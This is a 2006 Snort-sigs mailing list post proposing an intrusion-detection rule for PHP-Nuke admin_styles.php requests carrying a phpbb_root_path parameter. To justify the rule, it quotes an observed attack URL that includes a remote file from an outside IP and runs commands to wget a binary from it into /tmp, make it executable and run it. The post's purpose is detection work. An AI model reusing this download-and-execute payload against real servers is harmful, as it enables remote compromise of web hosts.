[Snort-sigs] new rule for detect PHP-Nuke admin_styles.php phpbb_root_path access

rmkml rmkml at ...324...
Mon Jan 2 06:45:02 EST 2006


Hi,

please check and maybe add this new rule :

web-php.rules:alert tcp $EXTERNAL_NET any -> $HOME_NET $HTTP_PORTS (msg:"WEB-PHP PHP-Nuke admin_styles.php phpbb_root_path access"; 
flow:to_server,established; content:"GET"; nocase; depth:3; uricontent:"/modules/Forums/admin/admin_styles.php"; 
nocase; uricontent:"phpbb_root_path|3D|"; nocase; reference:osvdb,16244; classtype:web-application-attack; )

I created this rule because receive this request :
/modules/Forums/admin/admin_styles.php?phpbb_root_path=http://209.136.48.69/cmd.dat?&cmd=cd%20/tmp;wget%20209.136.48.69/cbac;chmod%20744%20cbac;./cbac;echo%20YYY;echo|............

This url is strange, because phpbb_root_path param like phpBB,
but admin_styles.php file is phpNuke ...
and Im not find cve id with phpbb and admin_styles.

Improve/comments are welcome.

Regards
Rmkml




More information about the Snort-sigs mailing list